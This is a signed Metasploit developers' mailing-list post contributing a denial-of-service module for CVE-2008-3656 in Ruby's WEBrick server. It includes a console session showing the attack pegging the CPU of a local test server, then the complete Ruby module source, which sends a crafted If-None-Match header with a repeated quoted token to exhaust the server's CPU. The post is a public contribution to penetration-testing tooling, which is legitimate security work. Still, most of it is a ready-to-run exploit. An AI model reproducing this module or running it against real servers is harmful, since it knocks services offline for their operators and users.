-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey guys,

I've attached a new DoS module for the WEBrick vulnerability[1]
(WEBrick::HTTP::DefaultFileHandler) which causes massive CPU consumption.

I ran this simple server (like the one here[2]):


require 'webrick'
WEBrick::HTTPServer.new(:Port => 3333, :DocumentRoot => ".").start


in my metasploit SVN checkout, and then ran this:


msf > use dos/webrick_regex
msf auxiliary(webrick_regex) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(webrick_regex) > set RPORT 3333
RPORT => 3333
msf auxiliary(webrick_regex) > set URI /README
URI => /README
msf auxiliary(webrick_regex) > run
[*] Request sent to 127.0.0.1:3333
[*] Auxiliary module execution completed


And watched my CPU usage go through the roof until I killed the server.


msf auxiliary(webrick_regex) > info

       Name: Ruby WEBrick::HTTP::DefaultFileHandler DoS
    Version: 1

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        Use a proxy chain
  RHOST    127.0.0.1        yes       The target address
  RPORT    3333             yes       The target port
  SSL      false            no        Use SSL
  URI      /README          yes       URI to request
  VHOST                     no        HTTP server virtual host

Description:
  The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and
  earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423
  allows for a DoS (CPU consumption) via a crafted HTTP request.


Thanks,
Kris Katterjohn

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
[2] 
http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQIVAwUBSPfo/v9K37xXYl36AQJz5hAAgjUurVAXTXbOT5sw+9STo2CGSWU1Zto7
lTTc79QOyfmZZIJPN9e8lGGGTG7KBroxv0cwGwwurCQLeFyWSaIb/7dmc1Y353/5
hsDGPrxito8KaM7qY/UT3MRJbQdBK+XjbhGgUfldfhB+dP2iPz02bKl/Rbp/fXXV
wl4PSbF1fNlzLGkDE2ZilrO4amqxJ7c3X1hTcOC4AmkabYcxcgpnfxCz94irPSl+
Jr8lw9vN+6x3sj2pYEhzM2SpUIV9yERX/onX/+fYE3OHiSg2KycMPX8pbiZ1rFgN
Cw9D98BSBxGhpfS09UGCO4avooqs3D6Ea8tCV9WDCQZCOQoN+cryzQwCItqnBtUY
0uXHnccrXGBMlbAeKv4bp5K6GQJXLRKdrBc6NOQJ5e1jUrFSGdAOZo2Z25oQ5Q4R
yOPq1wYtTYxJyl3mU4XeEkpsfO8dTKYQQXRa7WtLGibFq2xUZg+OSLVqaX/bLmf8
SRhQwxGKLaC6jBDZilSfd3J2/JsqMj5zCpDiqOGsP2jhA4+iArpj4PIN+RG4GblJ
mBwztAolNjcl0GXUNfXjzW5ZoHXYJNf22YNZBeqieYPKEoZLiQD3KFsbGmJ9l0Us
95acG9fw3mxhiYq7P5OnXX21ytHwA+3HEfO4yQrsXQDzrJpjYsQ40WtSNIFQud/4
kJqH/wbxWcQ=
=dJWD
-----END PGP SIGNATURE-----
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
                super(update_info(info, 
                        'Name'           => 'Ruby 
WEBrick::HTTP::DefaultFileHandler DoS',
                        'Description'    => %q{
                                The WEBrick::HTTP::DefaultFileHandler in 
WEBrick in
                                Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 
1.8.7
                                to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
                                (CPU consumption) via a crafted HTTP request.
                        },
                        'Author'         => 'Kris Katterjohn <[EMAIL 
PROTECTED]>',
                        'License'        => MSF_LICENSE,
                        'Version'        => '1',
                        'References'     => [
                                [ 'BID', '30644'],
                                [ 'CVE', '2008-3656'],
                                [ 'URL', 
'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
                        ],
                        'DisclosureDate' => 'Aug 08 2008'))

                register_options([
                        OptString.new('URI', [ true, 'URI to request', '/' ])
                ])
        end

        def run
                begin
                        o = {
                                'uri' => datastore['URI'] || '/',
                                'headers' => {
                                        'If-None-Match' => %q{foo=""} + 
%q{bar="baz" } * 100
                                }
                        }

                        c = connect(o)
                        c.send_request(c.request_raw(o))

                        print_status("Request sent to #{rhost}:#{rport}")
                rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, 
::Rex::ConnectionTimeout
                        print_status("Couldn't connect to #{rhost}:#{rport}")
                rescue ::Timeout::Error, ::Errno::EPIPE                 
                end
        end
end

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to